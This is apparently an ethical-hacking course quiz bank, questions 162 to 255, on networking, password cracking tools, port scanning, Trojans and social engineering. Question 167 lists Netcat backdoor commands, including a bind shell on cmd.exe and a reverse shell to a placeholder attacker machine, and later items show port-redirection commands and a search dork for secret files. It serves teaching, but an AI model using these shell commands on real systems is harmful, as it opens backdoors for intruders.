162. During an audit of a server system log, which of the following entries would be considered a possible security threat?
a) Five failed login attempts on an admin account.
b) Two successful logins with the backup account.
c) A 500K print job sent to a printer.
d) Three new files saved in the accounting folder by user finance.

163. In order to determine which class any IP address is in, one should examine the first _____ bits of the IP address.
a) 8 bits
b) 3 bits
c) 4 bits
d) 5 bits

164. Which of the following software is a good port scanning tool?
a) Telnet
b) Nmap
c) ipconfig
d) portscan

165. Which software tool can be used for sniffing password?
a) John the Ripper
b) Brutus
c) John the Sniffer
d) Cain

166. You are connected to a server on the Internet and you click on a link on the server and receive a time-out message. What layer could be the cause of this message?
a) Application
b) Transport
c) Network
d) Physical

167. Which Netcat command is used as a backdoor on window systems?
a) c:\>nc -l -p 12345 -e cmd.exe
b) c:\>nc -l -p 12345 -e /bin/sh
c) c:\>nc -l -p 12345 -e ncrelay.bat
d) c:\>nc [attackers_machine] 12345 -e /bin/sh

168. In TCP header, there are TCP control bits, also know as the TCP flags.
a) 6
b) 7
c) 8
d) 9

169. Which of the following is NOT a countermeasures for password attack?
a) adopt a strong password policy.
b) educate user to security awareness.
c) conduct password cracking tests.
d) store encrypted or hashed password files in user account.

170. HTTP, FTP and Telnet work at which layer of the OSI model?
a) Application
b) Presentation
c) Session
d) Transport

171. Which of the following is a weak password policy?
a) use minimum of nine alphanumeric characters
b) implement aging password
c) use passphrases
d) use dictionary form password

172. Which type of Buffer Overflow Exploits will cause the operating system to shutdown or crash?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

173. Which software is used to extract password representations?
a) Cracker
b) John the Ripper
c) Pwdump3
d) Brutus

174. For Dos (Denial-of-Service) Attack, Stopping service can be achieved by:
i. Process killing
ii. Process crashing
iii. System reconfiguring
iv. Malformed packet attacks

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

175. _______ is the method used by Nmap to determine the operating system of the target comptuer.
a) Stack fingerprinting
b)OS fingerprinting
c)Banner stamping
d)OS stamping

176. Metasploit offers a huge set of _____, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself.
a) payloads
b) options
c) utilities
d) exploits

177. Internet is “managed” by
a. APNIC
b. ICANN
c. AfriNIC
d. ARIN

178. A password cracker is needed to quickly rediscover a password. It is believed the password is only seven characters long, but was computer generated. Which of the following techniques would be the best method to use?
a) Online guessing
b) Dictionary
c) Brute force
d) Hybrid

179. Each of the following is a characteristic of information except __________.
a) integrity
b) confidentiality
c) conformity
d) availability

180. The use of Domain Name System (DNS) is to _________.
a) translate computer's domain name into its appropriate IP address.
b) translate IP address into its appropriate computer's domain name.
c) translate computer's IP address into its approprate MAC address.
d) check for the correct computer's domain name.

181. Which of the following is a hardware or software system used to protect a network from unauthorized access?
a) Firepot
b) Windows XP
c) Honeypot
d) Firewall

182. Which one of the following is not a private IP address?
a) 10.1.2.1
b) 165.193.123.44
c) 172.18.36.4
d) 192.168.0.234

183. The most widely-deployed tunneling protocol is _________.
a) L2TP
b) RADIUS
c) PPP
d) PPTP

184. What port does the netbus server listen on?
a) 12345
b) 12346
c) 12347
d) any number greater than 12347

185. Which of the following SuperScan's tool is used to uncover the users account list at the target machine?
a) User Account Exploit
b) User engineering
c) Windows Enumeration
d) Windows User Exploit

186. Which of the following best describes a vulnerability?
a) A weakness in the configuration of software or hardware that could allow a threat to damage the network
b) Any agent that could do harm to your network or its components
c) The likelihood of a particular event happening given an asset and a threat
d) Measures the cost of a threat attacking your network

187. Which of the following is associated with behaviors such as collecting personal information or changing your computer configuration, without appropriately obtaining prior consent?
a) Trojan
b) Botnet
c) Spyware
d) Rootkit

188. You suspect that a system is infected with a Trojan Horse program and is sending data outbound from the system. Which of the following can be used to detect this activity?
a) Anti-spam software
b) Pop-up blocker
c) HIDS
d) Personal firewall

189. The most effective method of defending against social engineering is _________.
a) user awareness
b) strong password
c) anti-social
d) high end security tools

190. In Microsoft Windows, the name of the background program, such as Svchost.exe, is called a ________.
a) process
b) service
c) display service
d) parent service

191. Each of the following is a hacker's activity profile category except __________.
a) black hats
b) white hats
c) green hats
d) grey hats

192. What is usually the first phase conducted before doing a site penetration?
a) Information gathering
b) Cracking
c) Social engineering
d) Spoofing

193. Each of the following is an authentication technology except _________.
a) IEEE 802.11b
b) RADIUS
c) TACACS+
d) IEEE 802.1X

194. Which of the following is a correct URL of a web site using the SSL protocol?
a) http://www.sp.edu.sg
b) httpssl://www.sp.edu.sg
c) http://www.sp.edu.sg/ssl
d) https://www.sp.edu.sg

195. Which of the following protocol does Ethereal indicate when you launch a Web browser?
a) HyperText Transfer Protocol (HTTP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Internet Control Message Protocol (ICMP)

196. A network-based IDS is not suitable for detecting or protecting against which of the following?
a) E-mail spoofing
b) Denial-of-service attacks
c) Attacks against the network
d) Attacks against an environment that produce significant traffic

197. What is the purpose of Banner grabbing?
a) Is to grab the version of operating system used by target machine and its exploits.
b) Is to grab the message of the day banner from the network router.
c) Is to gain access to the system to look for which Web Server Application is running, its version and exploits.
d) is to extract a copy of Web server home page.

198. One reason employees are so successful at attacking their company's computers is __________.
a) they have superior networking skills
b) employees already have access to some company information
c) a company's information security is focused on keeping out intruders
d) employees have unlimited access to company computers

199. _______ and _______ are examples of Trojan programs.
a) Netbus, subseven
b) Netbus, supertrojan
c) Back Orifice, subeight
d) Back Orifice, supertrojan

200. Which is the best countermeasure to social engineering attacks?
a) Preventing the download of mobile code from the Internet
b) Employee training
c) Strong password policies
d) Auditing user activities

201. Which software tool can be used for port redirection apart from WinRelay?
a) PWdump3
b) Remote-Anything
c) Fpipe
d) DCOM RPC Exploit

202. Which protocol uses port 22 by default?
a) Telnet
b) FTP
c) SSH
d) HTTPS

203. Which type of Buffer Overflow Exploits allows attacker to install backdoor programs in victims's machine?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

204. A computer system is suspected of carrying a rootkit. What is the most efficient method of removing the rootkit?
a) Install anti-spyware software.
b) Disable the BIOS of the computer system and reboot.
c) Install the latest operating system update patch.
d) Reinstall the operating system.

205. Another name for anonymous FTP is _________.
a) blind FTP
b) free user FTP
c) Freenet
d) Unannounced FTP

206. Performing a ______ scan with Nmap can help an attacker avoid detection.
a) silent
b) secret
c) stealth
d) smooth

207. Each of the following is a phase of a malicious hacker attack except __________.
a) reconnaissance
b) clearing tracks
c) social engineering
d) scanning

208. Which of the following describes a passive attack?
a) Does not insert data into the stream but instead monitors information being sent.
b) Records and replays previously sent valid messages.
c) Inserts false packets into the data stream.
d) Makes attempts to verify the identify of the source of information.

209. Explain the command execution statement as shown:- >winrelay -lip 192.168.20.2 -lp 1002 -dip 193.21.74.35 -dp 1020 -tcp
a) tcp traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.
b) tcp traffic is redirected from source 192.168.20.2 at port 1020 to destination address 193.21.74.35 port 1002.
c) tcp traffic is redirected from source 193.21.74.35 at port 1020 to destination address 192.168.20.2 port 1002.
d) traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.

210. A person who applies his hacking skills for offensive purpose is known as
a. Cracker
b. White Hat
c. Ethical Hacker
d. Phreaker

211. Which of the following is example of social engineering?
a) An attacker configures a packet sniffer to monitor user logon credentials.
b) An attacker sets off a fire alarm so that he can access a secured area when the legitimate employees are evacuated.
c) An attacker waits until legitimate users have left and sneaks into the server room through the raised floor.
d) An attacker unplugs a user's network connection and then offers to help try to correct the problem.

212. Which of the folloiwng statement best describe a zombie?
a) It executes instruction command simultaneously to conduct a DoS attack. It is triggered by another system which is client of the attacker system.
b) It is a Netcat client of an attacker system. This client in return triggers DoS attack at the target system.
c) It is an unintelligent system that attacks the target system with fragmented packets.
d) It is an unintelligent system that sleeps all the way when their resources are exhausted by a DoS attack

213. Which of the following is NOT the correct method to enforce strong password policy?
a) enable the password complexity requirement.
b) use password filtering program.
c) use combination of standard and special characters.
d) encourage user to use special and difficult words.

214. You need to have secure communications using HTTPS. What port number is used by default?
a) 53
b) 23
c) 80
d) 443

215. Which of the following is the strongest form of authentication?
a) Biometric
b) Two-factor
c) Something you have
d) Username and password

216. Each of the following is a type of attacks except __________.
a) Access Attack
b) Denial of Service Attack
c) Security Attack
d) Repudiation Attack

217. Which of the following tools would be able to capture and view network packets that were transmitting passwords in clear text?
a) Vulnerability scanner.
b) Password cracker.
c) Network mapper.
d) Protocol analyzer.

218. The following are defence practices from DNS-based reconnaissance except _________.
a) domain names should not indicate any machine's operating system type
b) restrict zone transfers
c) block all ports except port 80
d) User Datagram Protocol (UDP) port 53 is used for DNS queries and responses, must be allowed for DNS to resolve name

219. Each of the following is a characteristic of the Layer 2 Tunneling Protocol (L2TP) except _________.
a) It merges the features of PPTP and Layer 2 Forwarding Protocol (L2F)
b) It requires a TCP/IP network
c) It can be implemented on devices like routers
d) It can support advanced encryption methods

220. To be beneficial to a company, which of the following is the most practical relationship between a security risk and its countermeasure?
a) The cost of the countermeasure should be less than the potential cost of the risk.
b) The cost of the countermeasure should be greater than the potential cost of the risk.
c) The cost of the countermeasure should be less than the cost of the asset.
d) The cost of the countermeasure should be greater than the cost of the asset.

221. What is a default password on a server system?
a) password that are set by the system manufacturer.
b) password that are set by the first user.
c) the password is "default"
d) password that are set by the administrator

222. The premise behind reconnaissance activities is to profile the following except _________.
a) size of organisation
b) administrative staff
c) network infrastructure
d) an organisation operations

223. Which TCP/IP utility is most often used to test whether an IP host is up and functional?
a) ftp
b) telnet
c) ping
d) netstat

224. Which of the following is not one of the Google's important technology?
a) Google help
b) Google cache
c) Google index
d) Google bots

225. Which of the following is NOT a type of port scanning?
a) IP Protocol Scan
b) Busy Scan
c) Idle Scan
d) UDP Port Scan

226. What is a blind FTP site?
a) A site where users don't authenticate
b) A site where all traffic is encrypted
c) A site where only anonymous access is allowed
d) A site where users can upload but not download

227. What is the name given to the activity that involves collecting information that will later be used for monitoring and review purposes?
a) Logging
b) Auditing
c) Inspecting
d) Vetting

228. Which of the following sentence best describe SYN cookies?
a) It is a SYN packet that consists of SYN - ACK and RESET signal.
b) It is a SYN grabber that grabs a session sequence number.
c) It is a single value created by a cryptographic one-way hash function to the source and destination IP addresses, port numbers and secret number.
d) It is a special number that provides source destination IP addresses and session sequence number.

229. The objectives of port scanning are to identify the following except ______.
a) Hardware model number
b) Open ports
c) Host operating system
d) Software or service versions

230. Each of the following can be identified as physical security except __________.
a) door locks
b) alarm systems
c) antivirus software
d) lighting

231. A host has a Class B, IP address of 128.78.0.2. Which network address does this host belongs to if there is no subnetting?
a) 128.78.0.0
b) 128.78.1.0
c) 128.78.2.0
d) 128.78.3.0

232. When attacker interact with an Web application, it starts to guess IDs and password of that session. This form of Web attack is known as ______.
a) Session Hijacking
b) URL Session Tracking
c) Account Harvesting
d) Web Harvesting

233. A rootkit has been discovered on your mission-critical database server. What is the best step to take to return this system to production?
a) Download history
b) Run an antivirus tool
c) Install an HIDS
d) Apply vendor patches

234. If the attack is process killing, which of the following category of Denial-of-Service attack it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

235. Services using an interprocess communication share such as network file and print sharing services leave the network susceptible to which of the following attacks?
a) Spoofing
b) Null sessions
c) DNS kiting
d) ARP poisoning

236. Which of the following components of an IP address is used to distinguish the network address from a host address?
a) Default geteway
b) Subnet mask
c) DNS server
d) WINS server


237. The purpose of the Ethereal's Filter option is to view desired _________.
a) Source
b) Destination
c) Info
d) Protocol


238. Explain the command execution statement as shown:- >fpipe -l 8081 -r 8080 192.168.1.5
a) redirect traffic from local machine at port 8081 to 192.168.1.5 port 8080.
b) redirect traffic from port 8081 to port 8080 on the same machine with IP address 192.168.1.5.
c) redirect traffic from local machine at port 8080 to 192.168.1.5 port 8081.
d) redirect traffic from port 8080 of 192.168.1.5 to port 8081 of the attacker's system.



239. Which layer of the OSI model is responsible for converting data into signals appropriate for the transmissiion medium?
a) Application
b) Network
c) Data Link
d) Physical

240. The following are the most notable password cracking tools except ______.
a) SuperCracker
b) Cain
c) John the Ripper
d) Pandora

241. Password guessing tools are useful in finding passwords on target machine except ______.
a) it is difficult to use
b) it might take too long
c) it does not offer brute-force selection feature
d) it words library is too small

242. A port scan has been performed on your e-mail server. Which of the following services and ports should be disabled?
a) TCP port 21.
b) TCP port 25.
c) TCP port 110.
d) TCP port 143.

243. Which of the following devices connects different network segments and uses tables to create a map of the network topology?
a) Switch
b) Router
c) Bridge
d) Hub

244. What port is used for a DNS zone transfer?
a) 53
b) 80
c) 135
d) 137

245. What is the best countermeasure against malicious code?
a) Manage user behavior
b) Prevent reuse of external removable media
c) Use antivirus software
d) Disable mobile code on web browsers

246. Which utility can you use to find the MAC and TCP/IP addresses of your Windows workstation?
a) ping
b) ipconfig
c) ipconfig /all
d) tracert

247. The following are defences against password cracking attacks except _______.
a) anti-password cracking software
b) strong password policy
c) password filtering software
d) use other authentication tools

248. Which of the following web server characteristics would be flagged as a risk by a vulnerability scanner?
a) Operating system not updated to latest patch level.
b) HTTPS server listening on port 443.
c) Network packets being sent in clear text.
d) HTTP server listening on port 80.

249. Which of the following is a valid Google's search command to look for all text files contain "secret"?
a) site:all filetype:txt secret
b) site:com filetype:txt secret
c) site:org filetype:txt secret
d) site:net filetype:txt secret

250. Firewalls provide security through what mechanism?
a) Watching for intrusions
b) Controlling traffic entering and leaving a network
c) Requiring strong passwords
d) Preventing misuse of company resources

251. When the telnet service is activated, it is accessed through ______.
a) TCP port 21
b) TCP port 80
c) TCP port 23
d) TCP port 25

252. The Ethereal packet capturing process would display the following except ______.
a) User id and password
b) Source
c) Destination
d) Protocol

253. You want to use NAT on your network, and you have received a Class C address from your ISP. What range of addresses should you use on the internal network?
a) 10.x.x.x
b) 172.16.x.x
c) 172.31.x.x
d) 192.168.x.x

254. Which of the following files is most likely to contain a virus?
a) database.dat.
b) bigpic.jpeg.
c) note.txt.
d) picture.gif.exe.

255. An attacker trying to exploit a web server will likely want to scan systems running web services. What port will the attacker scan for?
a) 21
b) 25
c) 80
d) 110

Download link for  255 quiz with all answer For Final Exam Topic 1 to Topic 11